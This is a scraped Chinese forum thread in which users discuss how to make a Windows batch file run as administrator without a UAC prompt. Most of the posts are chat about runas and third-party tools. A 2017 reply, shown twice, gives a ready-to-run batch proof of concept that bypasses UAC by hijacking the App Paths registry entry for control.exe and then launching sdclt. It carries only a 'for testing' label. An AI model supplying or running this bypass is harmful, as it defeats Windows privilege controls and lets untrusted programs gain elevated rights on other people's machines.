level 9
level 9
level 13
2013年07月30日 02点07分
3
要手动输入,没达到效果
2013年07月30日 02点07分
尼玛。。我这么老的贴都被翻出来了。。牛啊。我后来发现了一个工具来,第三方的,cyxgg应该知道,可以在bat里用命令调用使exe用管理员权限运行
2013年07月31日 08点07分
回复 735718299 :不能做成EXE文件,就要bat文件
2013年07月31日 12点07分
回复 13330696223 :我的意思是,有一个exe文件,就和sybc,CMOS等等的第三方。。。
2013年07月31日 12点07分
level 13
2013年07月30日 02点07分
4
回复 13330696223 :那还有么有其他的方法呢
2013年07月30日 02点07分
level 9
13330696223
楼主
能不能修改UAC来达到目的呢
2013年07月30日 02点07分
5
不能。UAC有自己保护
2013年07月30日 02点07分
回复 这不是随便取的 :那还有么有其他的方法呢
2013年07月30日 02点07分
回复 13330696223 :布吉岛
2013年07月30日 02点07分
回复 这不是随便取的 :![[泪]](/static/emoticons/u6cea.png)
2013年07月30日 02点07分
level 9
13330696223
楼主
用runas我觉得可以这样
runas /user:administrator 测试文件1.bat
可是要输入密码,没有密码的就没用
2013年07月30日 02点07分
6
runas /user:administrator 测试文件1.bat
可是要输入密码,没有密码的就没用
level 13
右键楼主。。。
未来 还不回家啊
2013年07月31日 08点07分
7
未来 还不回家啊
![[阴险]](/static/emoticons/u9634u9669.png)
来了也不做实事!!当官的果然不是好东西,不为民做实事
回复 13330696223 :再说一句。。。 群踢。。。 可以试试!
2013年07月31日 12点07分
回复 命幽 :什么意思![[乖]](/static/emoticons/u4e56.png)
官人饶命啊
2013年07月31日 12点07分
官人饶命啊
回复 13330696223 :![[吐]](/static/emoticons/u5410.png)
![[汗]](/static/emoticons/u6c57.png)
2013年07月31日 12点07分
level 14
我只会用第三方获取system权限。。
2013年08月01日 12点08分
8
system>管理员。来一个吧。顺便想知道一下sc create的type、start等所有参数的用法
2013年08月01日 12点08分
level 1
看来老夫要来水一发了。
对于这个东西,我们可以得到管理员,甚至可以绕过管理员
在FreeBuf上,有个sdclt.exe可以被利用
“在 Windows 10 开始,sdclt 加入了自动提升权限的能力,requestedExecutionLevel 由 asInvoker 变为 requireAdministrator”
输入sdclt后,直接打开控制面板,而且无需UAC赋予权限,那... ...![[滑稽]](/static/emoticons/u6ed1u7a3d.png)
我们来段PoC
----------------------------
@echo off
title I Wanna Adminstrator!
echo By WHOAMI
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 仅供测试学习!!!!!!!!!!!!!!!!!!!!
set /P run=Hey,Guy,要让哪一个程序UAC运行呢?
::Payload
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %run% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
----------------------------
仅供测试!希望能够帮到楼主!
2017年05月30日 01点05分
10
对于这个东西,我们可以得到管理员,甚至可以绕过管理员
在FreeBuf上,有个sdclt.exe可以被利用
“在 Windows 10 开始,sdclt 加入了自动提升权限的能力,requestedExecutionLevel 由 asInvoker 变为 requireAdministrator”
输入sdclt后,直接打开控制面板,而且无需UAC赋予权限,那... ...
我们来段PoC
----------------------------
@echo off
title I Wanna Adminstrator!
echo By WHOAMI
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 仅供测试学习!!!!!!!!!!!!!!!!!!!!
set /P run=Hey,Guy,要让哪一个程序UAC运行呢?
::Payload
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %run% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
----------------------------
仅供测试!希望能够帮到楼主!